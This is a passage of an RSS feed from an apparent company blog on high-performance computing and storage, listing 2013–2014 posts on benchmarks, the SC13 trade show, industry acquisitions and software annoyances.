      <guid>https://blog.scalability.org/2014/01/when-bugs-attack-the-case-of-the-ever-expanding-virtualbox-image/</guid>
      <description>So I&amp;rsquo;ve got a Mac Mini and a Linux machine on my desk at work. I am trying hard to use the Mac Mini for day to day stuff, but the sheer broken-ness of the keyboard (yes, really) for Mac&amp;rsquo;s is driving me near batty. I am trying though. (Hint to Apple: You aren&amp;rsquo;t better at everything, and most especially not keyboards and interfacing to higher quality Logitech keyboards, you almost completely fail &amp;hellip; don&amp;rsquo;t even get me started on mice &amp;hellip;).</description>
    </item>
    
    <item>
      <title>CentOS™ merges with Red Hat</title>
      <link>https://blog.scalability.org/2014/01/centos-merges-with-red-hat/</link>
      <pubDate>Tue, 07 Jan 2014 22:45:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/01/centos-merges-with-red-hat/</guid>
      <description>See this page for more. Inclusive of this merging is a new set of requirements for using the word CentOS. Since we ship an updated and modified kernel, and we update and modify packages to reflect our needs, we are going to have to alter our &amp;ldquo;CentOS derived distribution&amp;rdquo; statement. Or switch to another distribution. Its an annoyance, but maybe its time to revisit the distribution scenario. I see nothing wrong with using Debian as the basis, and building from there.</description>
    </item>
    
    <item>
      <title>Blocking hacker probes</title>
      <link>https://blog.scalability.org/2014/01/blocking-hacker-probes/</link>
      <pubDate>Sun, 05 Jan 2014 17:53:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/01/blocking-hacker-probes/</guid>
      <description>I honestly no longer even write a nice note to their ISP. I just tend to block the whole ISP from reaching our site(s). Its easier, and lower pain for us. Definitely saddens me that we have to do this, but I see enough probes in our logs that I have to.</description>
    </item>
    
    <item>
      <title>Fixed the IPoIB performance issue</title>
      <link>https://blog.scalability.org/2013/12/fixed-the-ipoib-performance-issue/</link>
      <pubDate>Fri, 27 Dec 2013 16:48:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/fixed-the-ipoib-performance-issue/</guid>
      <description>For our Unison Parallel File Systems Appliance:
[root@unison-jr4-2 ~]# iperf -c 10.3.1.1 ------------------------------------------------------------ Client connecting to 10.3.1.1, TCP port 5001 TCP window size: 1.00 MByte (default) ------------------------------------------------------------ [ 3] local 10.3.1.2 port 48383 connected with 10.3.1.1 port 5001 [ ID] Interval Transfer Bandwidth [ 3] 0.0-10.0 sec 13.5 GBytes 11.6 Gbits/sec  and of course in parallel
[root@unison-jr4-2 ~]# iperf -c 10.3.1.1 -P2 ------------------------------------------------------------ Client connecting to 10.3.1.1, TCP port 5001 TCP window size: 1.</description>
    </item>
    
    <item>
      <title>A network we can work with ...</title>
      <link>https://blog.scalability.org/2013/12/a-network-we-can-work-with/</link>
      <pubDate>Fri, 27 Dec 2013 02:56:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/a-network-we-can-work-with/</guid>
      <description>A Unison file system appliance connected with Infiniband and 10GbE.
[root@unison-jr4-2 ~]# qperf 10.3.1.1 rc_bi_bw rc_bi_bw: bw = 9.7 GB/sec [root@unison-jr4-2 ~]# qperf 10.3.1.1 ud_lat ud_bw ud_lat: latency = 3.66 us ud_bw: send_bw = 4.9 GB/sec recv_bw = 4.9 GB/sec  and of course, IPoIB
[root@unison-jr4-2 ~]# qperf 10.3.1.1 tcp_bw tcp_lat tcp_bw: bw = 474 MB/sec tcp_lat: latency = 13.4 us  which, if you run the same thing over a pair of good 10GbE ports &amp;hellip;</description>
    </item>
    
    <item>
      <title>M&amp;A continues ... Xyratex bought by Seagate</title>
      <link>https://blog.scalability.org/2013/12/ma-continues-xyratex-bought-by-seagate/</link>
      <pubDate>Tue, 24 Dec 2013 05:13:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/ma-continues-xyratex-bought-by-seagate/</guid>
      <description>The story is in the Register. An immediate question, and one of somewhat deja vu (all over again) &amp;hellip; what is the impact upon Lustre IP? Xyratex had announced that it obtained ownership of the Lustre IP from Oracle a few months ago. This IP was in the form of trademarks, and a number of related bits. Now Xyratex has been bought. And if it keeps the Lustre HPC bits, it will be directly competing with its customers.</description>
    </item>
    
    <item>
      <title>The evolving market for HPC: part 1, recent past</title>
      <link>https://blog.scalability.org/2013/12/the-evolving-market-for-hpc-part-1-recent-past/</link>
      <pubDate>Sat, 21 Dec 2013 17:20:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/the-evolving-market-for-hpc-part-1-recent-past/</guid>
      <description>I&amp;rsquo;ve said this many times, and at many different venues. HPC drives downmarket, and does so very hard. High cost solutions have limited lifetimes, at best. At worst, they will not catch on. 2013 was the year of the accelerators. We predicted this many years ago. I won&amp;rsquo;t beat this dead horse (for us). I&amp;rsquo;ll simply say &amp;ldquo;we were right&amp;rdquo;, and right with great specificity and accuracy. This seams to be a pattern with us.</description>
    </item>
    
    <item>
      <title>Calxeda restructures</title>
      <link>https://blog.scalability.org/2013/12/calxeda-restructures/</link>
      <pubDate>Thu, 19 Dec 2013 21:59:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/calxeda-restructures/</guid>
      <description>The day job had been talking to and working with Calxeda for a while. They&amp;rsquo;ve been undergoing some changes over the last few months as they worked to transition from an evangelist to a systems builder. The day job just got a note that they are restructuring. What this specifically means to an outsider, I am not sure, though I could speculate. HP has a vested interest in them. I wouldn&amp;rsquo;t be surprised to see a rapid asset acquisition.</description>
    </item>
    
    <item>
      <title>Prognostications for 2014 from an expert</title>
      <link>https://blog.scalability.org/2013/12/prognostications-for-2014-from-an-expert/</link>
      <pubDate>Tue, 17 Dec 2013 18:09:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/prognostications-for-2014-from-an-expert/</guid>
      <description>Not me. Henry Newman at Enterprise Storage Forum. See articlehere. His first prediction of more consolidation in the SSD space is a given. I&amp;rsquo;ve been arguing that for a while. On the fab side, there are what &amp;hellip; four producers left? Toshiba/Sandisk, Samsung, Intel/Micron, Hynix? Did I miss anyone? Will any of them leave (voluntarily or otherwise)? I think the SSD space that will really consolidate is on the SSD-as-a-rack-appliance side, as well as on the card side.</description>
    </item>
    
    <item>
      <title>Violin kicks out founding CEO</title>
      <link>https://blog.scalability.org/2013/12/violin-kicks-out-founding-ceo/</link>
      <pubDate>Tue, 17 Dec 2013 17:07:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/violin-kicks-out-founding-ceo/</guid>
      <description>Story at The Register. Usually you give a CEO some time to right a listing ship. I pointed out in a recent post that there are some significant grumblings about Violin and in fact about most of the flash-as-rack-appliance space. I had noted
We&amp;rsquo;ve run into them a few times in competitive situations, so take what I write about them with an appropriate mass of NaCl. All the pure-play flash array vendors have to answer a basic question about their existence.</description>
    </item>
    
    <item>
      <title>M&amp;A:  Avago grabs ... LSI ... ?</title>
      <link>https://blog.scalability.org/2013/12/ma-avago-grabs-lsi/</link>
      <pubDate>Tue, 17 Dec 2013 16:24:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/ma-avago-grabs-lsi/</guid>
      <description>Avago, a spinout from Agilent which was a spinout from HP, just bought LSI. Avago is largely a supplier of components to a variety of industries, dealing with modules, optoelectronics, etc. If you look at their product mix, you see effectively zero overlap with LSI. They are not even in, arguably, the same markets. I am scratching my head over this one. I could see it as a play to gain a foothold into the storage space.</description>
    </item>
    
    <item>
      <title>First new Unison product sold</title>
      <link>https://blog.scalability.org/2013/12/first-new-unison-product-sold/</link>
      <pubDate>Thu, 12 Dec 2013 20:59:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/first-new-unison-product-sold/</guid>
      <description>We were showing off the Unison units at #SC13, and while on the show floor, we managed to sell a storage cluster. Well, technically, the sale occurred after the show (last week in reality), but most of the configuration back and forth was during the show. I can&amp;rsquo;t say anything about the configuration or stack on it &amp;hellip; yet &amp;hellip; but you&amp;rsquo;ll be hearing about it fairly soon. Its one we talk about quite a bit.</description>
    </item>
    
    <item>
      <title>Violin&#39;s (and other pure flash array vendors) post IPO struggles continue</title>
      <link>https://blog.scalability.org/2013/12/violins-and-other-pure-flash-array-vendors-post-ipo-struggles-continue/</link>
      <pubDate>Thu, 12 Dec 2013 18:47:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/violins-and-other-pure-flash-array-vendors-post-ipo-struggles-continue/</guid>
      <description>There&amp;rsquo;s a story on The Register right now about Violin Memory losing its CTO. But that&amp;rsquo;s not the real interesting story. In the article, Chris Mellor does a pretty good job of laying bare the issues around Violin.
There are several different threads running through this. First, they don&amp;rsquo;t have much real software IP. Their hardware IP is a different story, but fundamentally, we&amp;rsquo;ve found that its best to have a very simple and effective hardware design, coupled with intelligent software.</description>
    </item>
    
    <item>
      <title>You can tell you are a little nuts if ...</title>
      <link>https://blog.scalability.org/2013/12/you-can-tell-you-are-a-little-nuts-if/</link>
      <pubDate>Wed, 11 Dec 2013 23:25:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/you-can-tell-you-are-a-little-nuts-if/</guid>
      <description>&amp;hellip; you get really annoyed at the performance of grep on file IO (seriously folks? 32k or page size sized IO? What is this &amp;hellip; 1992?) so you rewrite it in 20 minute in Perl, and increase the performance by 5-8x or so. If I get angry enough, I might just go all out, use direct IO, multiple parallel readers, and some other bits. I&amp;rsquo;ve got these huge disk pipes, awesome bandwidths, and this tiny little filter tool.</description>
    </item>
    
    <item>
      <title>The most popular data analytics language</title>
      <link>https://blog.scalability.org/2013/12/the-most-popular-data-analytics-language/</link>
      <pubDate>Sat, 07 Dec 2013 18:05:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/the-most-popular-data-analytics-language/</guid>
      <description>&amp;hellip; appears to be R
[ ](http://revolution-computing.typepad.com/.a/6a010534b1db25970b019b00077267970b-popup)
This is in line with what I&amp;rsquo;ve heard, though I thought SAS was comparable in primary or secondary tool usage. This said, its important to note that in this survey, we don&amp;rsquo;t see mention of Python. Working against this is that it is a small (1300-ish) self-selecting sample, and the reporting company has a stake in the results. Also of importance is that R is a package with an embedded programming language, and Python is a programming language with add-ons.</description>
    </item>
    
    <item>
      <title>And the SC13 video from InsideHPC is up</title>
      <link>https://blog.scalability.org/2013/12/and-the-sc13-video-from-insidehpc-is-up/</link>
      <pubDate>Fri, 06 Dec 2013 14:12:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/and-the-sc13-video-from-insidehpc-is-up/</guid>
      <description>As usual Rich and the team at InsideHPC have done a tremendous job. If you don&amp;rsquo;t know InsideHPC and its sibling, InsideBigData, I highly recommend both publications. They are on my go-to list as information sources/summaries. The video shows a well caffinated Joe, talking through our new products. The problem for us was there simply wasn&amp;rsquo;t sufficient time to go into detail on everything. Which is a shame IMO, but one we&amp;rsquo;ll look at rectifying later.</description>
    </item>
    
    <item>
      <title>The 60 second guide to big data by gogrid</title>
      <link>https://blog.scalability.org/2013/12/the-60-second-guide-to-big-data-by-gogrid/</link>
      <pubDate>Tue, 03 Dec 2013 14:49:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/12/the-60-second-guide-to-big-data-by-gogrid/</guid>
      <description>The GoGrid folks have put together a nice marketing slide on big data, in the sense that they are explaining the features of it without explaining it, or how/where they fit. Its implied that they provide all you need for Big Data, but its their points along the way that make a great point for the day job and especially our new Fast Path Big Data Appliances. Our argument has always been that you can&amp;rsquo;t approach Big Data with last millennium&amp;rsquo;s architecture.</description>
    </item>
    
    <item>
      <title>Big data languages: the reason for the tests</title>
      <link>https://blog.scalability.org/2013/11/big-data-languages-the-reason-for-the-tests/</link>
      <pubDate>Sat, 30 Nov 2013 21:14:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/big-data-languages-the-reason-for-the-tests/</guid>
      <description>In a number of recent articles, I&amp;rsquo;ve seen/read that &amp;ldquo;Python is displacing R&amp;rdquo;, and other similar things. Something about this intrigued me, as I had heard many years ago that &amp;ldquo;Python was displacing Perl&amp;rdquo;. Only, it wasn&amp;rsquo;t. And others are questioning the supplantation premise quite strongly. It seems that there is little actual evidence of this. Mostly hyperbole, guesses, and dare I say, wishful thinking. It seems that this is modus operandi for Python advocates, and their latest object of attention is R.</description>
    </item>
    
    <item>
      <title>Riemann zeta function in parallel/vector data languages</title>
      <link>https://blog.scalability.org/2013/11/riemann-zeta-function-in-parallelvector-data-languages/</link>
      <pubDate>Sat, 30 Nov 2013 20:26:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/riemann-zeta-function-in-parallelvector-data-languages/</guid>
      <description>Continuing the work of the previous post, I looked into rewriting the serial code to run in parallel/vector data languages. My original supposition about what would make a good data language is now in doubt as a result. First, I used PDL in Perl. But its Perl, right? It can&amp;rsquo;t possibly be fast. That would be &amp;hellip; like, I dunno &amp;hellip; wrong? (yes, this is sarcasm). This completes the task in 12s.</description>
    </item>
    
    <item>
      <title>Quick tests with Riemann zeta function code in a few languages</title>
      <link>https://blog.scalability.org/2013/11/quick-tests-with-riemann-zeta-function-code-in-a-few-languages/</link>
      <pubDate>Sat, 30 Nov 2013 07:00:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/quick-tests-with-riemann-zeta-function-code-in-a-few-languages/</guid>
      <description></description>
    </item>
    
    <item>
      <title>Knights Landing</title>
      <link>https://blog.scalability.org/2013/11/knights-landing/</link>
      <pubDate>Fri, 29 Nov 2013 17:36:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/knights-landing/</guid>
      <description>Over at InsideHPC, Rich has a short take on Knights Landing with a link to the longer article. This is implicitly the direction I thought things would be going in &amp;hellip; drop in replacement CPUs to provide acceleration. Probably some big-small designs to handle OS tasks on specific cores (and reduce OS based jitter). This said, 2x such sockets gets you to 72 lanes of PCIe gen 3. A little light for us, but we&amp;rsquo;ll figure something out (our current units are more than this).</description>
    </item>
    
    <item>
      <title>... and OCZ goes down</title>
      <link>https://blog.scalability.org/2013/11/and-ocz-goes-down/</link>
      <pubDate>Wed, 27 Nov 2013 23:39:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/and-ocz-goes-down/</guid>
      <description>see here This is a chapter 7, dissolution, not a chapter 11 restructuring. Assets to be sold, likely to Toshiba.
I expect more of these from other vendors. SSD space has been needing a consolidation for a while. STEC purchased by WD, Smart by Sandisk has removed most of the high end of the market from the startup side. Pliant was grabbed by Sandisk previously. Whom else remains? On the low-midrange of the market, you have Intel, Micron, and a few others.</description>
    </item>
    
    <item>
      <title>I guess no one at the beobash saw the 10% discount link ...</title>
      <link>https://blog.scalability.org/2013/11/i-guess-no-one-at-the-beobash-saw-the-10-discount-link/</link>
      <pubDate>Wed, 27 Nov 2013 16:24:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/i-guess-no-one-at-the-beobash-saw-the-10-discount-link/</guid>
      <description>Basically, if you go to this site, provide your information, use the code &amp;ldquo;beobash13&amp;rdquo;, you get a nice discount on your next purchase from Scalable Informatics until the end of 2013. The rules are simple. Basically you provide your contact information, let us know what products you want to talk about, buy them and pay for them by the end of the year. We are offering something like a 10% discount for this.</description>
    </item>
    
    <item>
      <title>Finally have a customer information page talking directly to zoho crm</title>
      <link>https://blog.scalability.org/2013/11/finally-have-a-customer-information-page-talking-directly-to-zoho-crm/</link>
      <pubDate>Mon, 25 Nov 2013 06:35:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/finally-have-a-customer-information-page-talking-directly-to-zoho-crm/</guid>
      <description>This took a bit, as the API is documented, but wasn&amp;rsquo;t quite working for some reason. But now we&amp;rsquo;ve linked our signup page to drop data directly into zoho. This was made harder by the XML based API not working as documented. I posted a forum note, after searching on the forum for answers. Others had the same questions. I built a simple testing code, and it didn&amp;rsquo;t work. Posted this to the forum.</description>
    </item>
    
    <item>
      <title>SC13: the Limulus boxen appear</title>
      <link>https://blog.scalability.org/2013/11/sc13-the-limulus-boxen-appear/</link>
      <pubDate>Sat, 23 Nov 2013 19:32:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/sc13-the-limulus-boxen-appear/</guid>
      <description>[Disclosure: we do have a business relationship with Basement Supercomputing] (this is a longer version of the beowulf item I posted) Years ago, I came to the conclusion that there was no personal supercomputing market after we tried with a deskside system &amp;hellip; what I called a &amp;ldquo;muscular desktop&amp;rdquo; with a great deal of IO, processing, ram, and graphics. We just could not find the right niche for this, and we were being badly undercut in price by the Dell-like companies of the world, selling low end boxes that were &amp;hellip; good enough &amp;hellip; for a small set of tasks.</description>
    </item>
    
    <item>
      <title>SC13 observations</title>
      <link>https://blog.scalability.org/2013/11/sc13-observations/</link>
      <pubDate>Sat, 23 Nov 2013 18:59:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/sc13-observations/</guid>
      <description>From a post to the beowulf list:
 I didn&amp;rsquo;t get a chance to see many booths &amp;hellip; I did get free the last hour of Thursday to wander, and made sure I got to see a few people and companies. What I observed (and please feel free to challenge/contradict/offer alternative interpretations/your own views) will definitely be colored by the glasses we wear, and the market we are in.
 not so many chip companies (new processor designs, etc.</description>
    </item>
    
    <item>
      <title>SC13 finale</title>
      <link>https://blog.scalability.org/2013/11/sc13-finale/</link>
      <pubDate>Sat, 23 Nov 2013 00:44:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/sc13-finale/</guid>
      <description>That was a wonderful show. People got to see what we were about, our new appliances, our performance. I see many possibilities. This is good. Some key takeaways:
 We have the fastest densest systems in market. Our usable performance far outpaces our nearest competitors configurations which are not in a reasonable config (hello &amp;hellip; 60+ raw JBOD? or RAID0 &amp;hellip; seriously? And no one has challenged them on this?) our partners rocked.</description>
    </item>
    
    <item>
      <title>SC13: Day 2 wrap up</title>
      <link>https://blog.scalability.org/2013/11/sc13-day-2-wrap-up/</link>
      <pubDate>Thu, 21 Nov 2013 06:07:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/sc13-day-2-wrap-up/</guid>
      <description>Day 1 was incredible. Day 2 topped day 1 by a fair amount. I had realized yesterday that I had forgotten to put up our speedometer website which pulled data directly from the siFlash hardware on the real IO performance. I had this unit running hard, and the IO operations were moving quite well. So I put up the web page on my laptop, and this is what we saw 30GB/S.</description>
    </item>
    
    <item>
      <title>An apology</title>
      <link>https://blog.scalability.org/2013/11/an-apology/</link>
      <pubDate>Thu, 21 Nov 2013 04:23:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/an-apology/</guid>
      <description>When I mess up, I don&amp;rsquo;t normally do it in a small way. I jump in hard, head first. I made an assumption about something I did not have all the facts about today, and began to tear into someone whom did not deserve this treatment, after making him wait for me at our booth. Yeah, this was a major screw up on my part. Addison, I hope you will forgive me, and accept my humble apology.</description>
    </item>
    
    <item>
      <title>SC13 day 1 wrap up</title>
      <link>https://blog.scalability.org/2013/11/sc13-day-1-wrap-up/</link>
      <pubDate>Wed, 20 Nov 2013 08:32:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/sc13-day-1-wrap-up/</guid>
      <description>A good day at the booth. The talks were well attended, and speakers and their topics were interesting. Our partners in the booth: Kx, Veristorm, Basement Supercomputing, Sandisk, XtremeData, and Inktank are phenomenal. We announced many new products, all on display at our booth, and the partners working with us on these products were there to talk about the applications. What we didn&amp;rsquo;t show off were the speedometers measuring the performance live on the systems.</description>
    </item>
    
    <item>
      <title>Interesting article</title>
      <link>https://blog.scalability.org/2013/11/interesting-article/</link>
      <pubDate>Sat, 16 Nov 2013 01:26:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/interesting-article/</guid>
      <description>I read this on Gigaom. In it, there is a claim of the densest storage on the market coming from Quanta, and a full rack of them would be about 3/4 ton (about 682 kg). Amazon uses a &amp;ldquo;special&amp;rdquo; design that comes in more than a ton according to the article. So I decided to look into what a simple 42U rack of say 10 of our bad boys would come out with weight wise.</description>
    </item>
    
    <item>
      <title>Legend ... wait for it ... dary!</title>
      <link>https://blog.scalability.org/2013/11/legend-wait-for-it-dary/</link>
      <pubDate>Fri, 15 Nov 2013 22:32:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/legend-wait-for-it-dary/</guid>
      <description>This bit on 0mq&amp;rsquo;s forum &amp;hellip; My favorite comment:</description>
    </item>
    
    <item>
      <title>Broken APIs and other time wasters</title>
      <link>https://blog.scalability.org/2013/11/broken-apis-and-other-time-wasters/</link>
      <pubDate>Fri, 15 Nov 2013 06:25:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/broken-apis-and-other-time-wasters/</guid>
      <description>So I spent the day trying to figure out why my simple form submission which then generated an XML output, and then a subsequent post to Zoho CRM, did not, in fact, work. I was doing this without the Zoho code, just a description of their API. Its an older API, that much is obvious. You talk to it through XML. You post your XML. But you put parameters on the URI to control the post.</description>
    </item>
    
    <item>
      <title>Sneak peek at UI atop RESTful API</title>
      <link>https://blog.scalability.org/2013/11/sneak-peek-at-ui-atop-restful-api/</link>
      <pubDate>Wed, 13 Nov 2013 16:27:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/sneak-peek-at-ui-atop-restful-api/</guid>
      <description>This is our new, common UI across all machines, clusters, clouds, appliances, tiburon/Scalable OS &amp;hellip; This one in particular is running atop our siRouter. More on that soon, but have a little gander.
[ ](/images/SOS-v1.png)
The UI is basically a &amp;ldquo;thin&amp;rdquo; layer atop the RESTful interface. And its a proper RESTful interface, none of this conflated GET where we mean POST/PUT and all that. More at SC13. I promise.</description>
    </item>
    
    <item>
      <title>kvm incompatible with xfs</title>
      <link>https://blog.scalability.org/2013/11/kvm-incompatible-with-xfs/</link>
      <pubDate>Sun, 10 Nov 2013 03:17:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/kvm-incompatible-with-xfs/</guid>
      <description>Just found this out by way of an experiment for a partner. Cool partner, cool product, running on our fast hardware for SC13. Problem is that I was seeing some very odd error messages when I tried to mount a volume stored in a file on an xfs based LUN. I could dd to the file. I could mkfs.ext* the /dev/vda. But the moment I tried to mount it, block errors.</description>
    </item>
    
    <item>
      <title>BeoBash13: the revenge of the rampaging physics-turned-supercomputer geeks?</title>
      <link>https://blog.scalability.org/2013/11/beobash13-the-revenge-of-the-rampaging-physics-turned-supercomputer-geeks/</link>
      <pubDate>Thu, 07 Nov 2013 00:06:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/beobash13-the-revenge-of-the-rampaging-physics-turned-supercomputer-geeks/</guid>
      <description>Or something like that. See here We&amp;rsquo;ll be there!</description>
    </item>
    
    <item>
      <title>SC13 T-14 days</title>
      <link>https://blog.scalability.org/2013/11/sc13-t-14-days/</link>
      <pubDate>Tue, 05 Nov 2013 04:25:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/sc13-t-14-days/</guid>
      <description>We will be at booth 1919. Please do come by and say hello. We&amp;rsquo;ll have coffee/tea (I think), a number of machines, great partners with a number of demos, and hopefully some talks on big data analytics in Financial Services, Parallel high performance databases, massive key-value storage and processing, as well as a few other bits. We&amp;rsquo;ll have a very cool box from one of our friends in the booth. We ship the machines at the end of this week, or beginning of next.</description>
    </item>
    
    <item>
      <title>And then they fight you</title>
      <link>https://blog.scalability.org/2013/11/and-then-they-fight-you/</link>
      <pubDate>Tue, 05 Nov 2013 04:15:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/and-then-they-fight-you/</guid>
      <description>We&amp;rsquo;ve been championing the tightly coupled storage and computing model for a long time. When it was unfashionable, when it was discarded as &amp;ldquo;this is something you should not do&amp;rdquo; by others &amp;ldquo;who knew better&amp;rdquo;. Now, the ideas, the concepts, the thoughts, the designs and implementations behind it are all around. Joyent&amp;rsquo;s Manta system is an implementation of the concept. Arguably, the more advanced MapReduce and Hadoop designs are also implementations &amp;hellip; have the data right next to the processing, and provide gargantuan bandwidth locally to the data.</description>
    </item>
    
    <item>
      <title>Cray acquires the IP assets and people of Gnodal</title>
      <link>https://blog.scalability.org/2013/11/cray-acquires-the-ip-assets-and-people-of-gnodal/</link>
      <pubDate>Fri, 01 Nov 2013 16:34:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/11/cray-acquires-the-ip-assets-and-people-of-gnodal/</guid>
      <description>We used Gnodal units for the original Lucera system. Very nice devices with a few idiosyncrasies. Gnodal ran into some funding problems earlier this year, and had to find a buyer. Cray grabbed them and a number of the people involved. This is good for Gnodal and Cray. Gnodal has interesting technology. And Cray may be looking at how to leverage SDN for its system using this (wild guess on my part, I have no knowledge direct or indirect of their plans/intentions/&amp;hellip;).</description>
    </item>
    
    <item>
      <title>First distributed file system for STAC M3 benchmarks</title>
      <link>https://blog.scalability.org/2013/10/first-distributed-file-system-for-stac-m3-benchmarks/</link>
      <pubDate>Tue, 29 Oct 2013 01:35:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/first-distributed-file-system-for-stac-m3-benchmarks/</guid>
      <description>We ran the STAC M3 on a Ceph based storage cloud appliance you will be hearing more about soon. The report should be up on the STAC site later this week. Here are some of the take-aways:
We chose Ceph for several reasons, but you should expect to see others very soon as well. Our Cluster and Cloud storage appliances are based upon our very powerful and very dense building blocks.</description>
    </item>
    
    <item>
      <title>At the STAC Summit in NYC, presenting our Time Series Analytics Appliance</title>
      <link>https://blog.scalability.org/2013/10/at-the-stac-summit-in-nyc-presenting-our-time-series-analytics-appliance/</link>
      <pubDate>Tue, 29 Oct 2013 01:28:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/at-the-stac-summit-in-nyc-presenting-our-time-series-analytics-appliance/</guid>
      <description>This was a good meeting in general. Lively panelists, focused panels, though somewhat vendor heavy in a number of cases. I have a sense of a &amp;ldquo;Gandhi&amp;rdquo; experience in progress from the parallel file systems panel. 4 vendors, one user. The user was fantastic, and the vendors were pushing most of their own stuff. One vendor in particular took some not too thinly veiled shots directly at us without naming us.</description>
    </item>
    
    <item>
      <title>But, of course</title>
      <link>https://blog.scalability.org/2013/10/but-of-course/</link>
      <pubDate>Fri, 25 Oct 2013 04:20:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/but-of-course/</guid>
      <description>So I ran out of space on my travel laptops small SSD. I wanted to update to a larger SSD, and I figured I&amp;rsquo;d move my partitions over and resize. But the gods would not allow for such an operation as they have in the past. Oh no. Upon switching out the 120 GB Intel SSD for the 240 GB SSD (spare unit we had), and putting the 120 GB SSD into a USB 3 holder, I discovered that a) the drive wouldn&amp;rsquo;t register with the machine most of the time (it errored out during SCSI plugin detection), or b) when it did detect properly, it wouldnt provide partitions I could copy off.</description>
    </item>
    
    <item>
      <title>Our little time series analytical appliance is one fast monster</title>
      <link>https://blog.scalability.org/2013/10/our-little-time-series-analytical-appliance-is-one-fast-monster/</link>
      <pubDate>Mon, 21 Oct 2013 17:43:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/our-little-time-series-analytical-appliance-is-one-fast-monster/</guid>
      <description>Running some burn in testing:
Run status group 0 (all jobs): READ: io=523296MB, aggrb=12093MB/s, minb=12093MB/s, maxb=12093MB/s, mint=43274msec, maxt=43274msec WRITE: io=523296MB, aggrb=7469.4MB/s, minb=7469.4MB/s, maxb=7469.4MB/s, mint=70059msec, maxt=70059msec  More soon</description>
    </item>
    
    <item>
      <title>This week past has been (mostly) incredible</title>
      <link>https://blog.scalability.org/2013/10/this-week-past-has-been-mostly-incredible/</link>
      <pubDate>Sun, 20 Oct 2013 15:24:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/this-week-past-has-been-mostly-incredible/</guid>
      <description>Feeling not happy about my time away from my family, and not happy about Vipin&amp;rsquo;s time away from his, we still accomplished a great deal. Some unhappy things I still have to deal with, and I will soon. But this has been a great week. Look for some announcements around the SC13 show. We will have some nice things to talk about at our booth (#1919 , please do come and visit us there, we will have coffee, snacks, as well as our team, partners, and friends there!</description>
    </item>
    
    <item>
      <title>And the benchmarks are out</title>
      <link>https://blog.scalability.org/2013/10/and-the-benchmarks-are-out/</link>
      <pubDate>Wed, 16 Oct 2013 03:39:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/and-the-benchmarks-are-out/</guid>
      <description>Check out the official site for more info. Take home messages for the soon to be announced system
and
What is this magical beast you ask? What are its configuration limits? You&amp;rsquo;ll have to wait for the official unveiling.</description>
    </item>
    
    <item>
      <title>New benchmark results imminent</title>
      <link>https://blog.scalability.org/2013/10/new-benchmark-results-imminent/</link>
      <pubDate>Mon, 14 Oct 2013 17:40:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/new-benchmark-results-imminent/</guid>
      <description>Will update once they are released. I can&amp;rsquo;t tell you numbers within. I can say that we are quite happy with the results. More (very) soon. I promise.</description>
    </item>
    
    <item>
      <title>Heh ...</title>
      <link>https://blog.scalability.org/2013/10/heh/</link>
      <pubDate>Fri, 11 Oct 2013 22:55:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/heh/</guid>
      <description>[ ![](/images/eunuch programmers.jpg)
](http://www.businessinsider.com/scott-adams-favorite-dilbert-comics-2013-10)</description>
    </item>
    
    <item>
      <title>This would be funny if it weren&#39;t sad</title>
      <link>https://blog.scalability.org/2013/10/this-would-be-funny-if-it-werent-sad/</link>
      <pubDate>Thu, 10 Oct 2013 16:43:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/this-would-be-funny-if-it-werent-sad/</guid>
      <description>Over on the pfSense mailing list there is a serious level of tin-foil-hat (TFH) and rampant paranoia, coupled with extreme lack of etiquette on the part of the TFH brigade. And, to make it more enjoyable, at least one overt and humorous case of attempted cyber bullying against me personally for imploring people to stop hijacking a technical discussion list, as well as people decrying a faux oppression from people whom are genuinely wanting the list to return to its technical roots.</description>
    </item>
    
